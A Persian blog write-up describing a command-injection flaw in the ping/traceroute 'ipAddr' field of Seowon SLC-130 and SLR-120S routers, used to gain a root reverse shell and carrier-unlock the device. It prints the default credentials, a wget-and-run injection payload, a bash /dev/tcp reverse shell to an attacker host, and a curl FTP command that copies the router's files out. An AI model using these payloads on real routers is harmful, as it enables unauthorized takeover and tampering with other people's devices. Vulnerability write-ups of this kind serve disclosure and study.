Milad Soltanian
Milad Soltanian
خواندن ۳ دقیقه·۴ سال پیش

رایت آپ کشف آسیب پذیری RCE و آنلاک مودم/روتر های Seowon Slc-130 و SLR-120S


سلام ، امیدوارم حالتون خوب باشه و همیشه شاد و خندون باشید :)

قصد داریم با نحوه کشف آسیب پذیری در روترSeowon Slc-130 آشناتون کنیم ؛ این روتر ظاهرا توسط مبین نت ( mobinet ) استفاده میشه اما خب شرکت اصلی Seowon در کره جنوبی مستقر هستش ...

بر حسب اتفاق این روتر به دستمون رسید و خب خط مبین نت ایی که داخل اش بود حجم نداشت ~!~

با خودمون گفتیم خوبه یه نگاهی به وب اینترفیسش بکنیم و ببینیم چیا داره که خب منجر به کشف آسیب پذیری RCE و در نهایت reverse shell با دسترسی روت شد :)

در ادامه به نحوه کشف این آسیب پذیری میپردازیم . ابتدا به پنل لاگین و شروع به recon کردیم .

نکته : نام کاربری و پسورد پیشفرض admin/admin هستش .

در بین صفحات مختلف و درخواست هایی که ارسال میشد سمت روتر این قسمت Monitroing نظرم و جلب کرد چرا که امکان ping + trace route به ما میداد .

قسمت جالب انگیز
قسمت جالب انگیز

پس برای انجام RCE تلاش کردم با cmd seperator ها که خب موفقیت آمیز بود :)

پارامتر آسیب پذیر : ipAddr

دسترسی r0Ot
دسترسی r0Ot


ipAddr=;wget http://192.168.1.10/payload.txt;bash payload.txt


حال چالش بعدی گرفتن reverse shell بود ، خب اینجا تنها راهی که میشد از این روتر شل معکوس بگیریم bash بود چراکه perl,py,nc و ... روی این روتر وجود نداره =))

محتویات payload.txt به شرح زیر است : 

“ bash -i >& /dev/tcp/192.168.1.10/8080 0>&1 ”

پس یک وب سرور ستاپ کردیم تا بتونیم پیلود رو دانلود و اجرا کنیم .

we got shell on the box
we got shell on the box

در نهایت یک interactive shell بصورت reverse از این روتر به دست آوردیم .


حال نوبت به تلاش برای Unlocking دستگاه میرسه ، که بتونیم حداقل از اون خط همراه اول که حجم داره استفاده کنیم :دی

اولین کاری که نیازه انجام بدیم برای راحتی مراحل بعدی و کشف موارد مختلف اینه که بیایم و فایل های روی این روتر رو منتقل کنیم روی سیستم خودمون ، با توجه به سیستم عامل به نظرم تنها راهکار curl بودش البته با wget هم میشد فرایند آپلود رو انجام داد اما خب ما curl + ftp رو انتخاب کردیم :

انتقال اطلاعات
انتقال اطلاعات



کامند استفاده شده به شرح زیر هستش : 


“ find www -type f -exec curl -u maj0r:maj0r — ftp-create-dirs -T {} ftp://192.168.1.10/{} \; ”


با توجه به اینکه اسم شرکت رو میدونیم فقط نیازه یه grep ساده انجام بدید تا فایل هایی که ممکنه به دردمون بخوره رو پیدا کنیم :


فایل مورد نظر
فایل مورد نظر

فایل مورد نظر رو پیدا کردیم که متحویات اش به شرح زیر است :

دستور مورد نظر
دستور مورد نظر

کامند مورد نظر برای Unlock کردن رو هم داریم ، پس با توجه به شل معکوسی که در مراحل قبل گرفتیم اقدام به Unlock کردن دستگاه میکنیم :


OK ~!~
OK ~!~

با توجه به خروجی دستور و تست عملی دستگاه Unlock شده و دیگر سیم کارت ها را پشتیبانی میکند .

تشکر فراوان از جناب علی جلالت دوست و همکار خوبم بابت همه چیز.

با تشکر از زمانی که برای خواندن این مطلب گذاشتید.

لازم به ذکر است که موارد مذکور روی روتر SLR-120S نیز جواب گو میباشد .

خوشحال میشیم اگر در توییتر دیگر مطالب رو نیز مطالعه بفرمایید .


https://twitter.com/AliJalalat

https://twitter.com/maj0rmil4d

rcevulnerabilityexploitpentestmaj0rmil4d
Milad Soltanian
Milad Soltanian
میلاد سلطانیان هستم و وب سایت شخصی من : https://secureguy.ir است :)
شاید از این پست‌ها خوشتان بیاید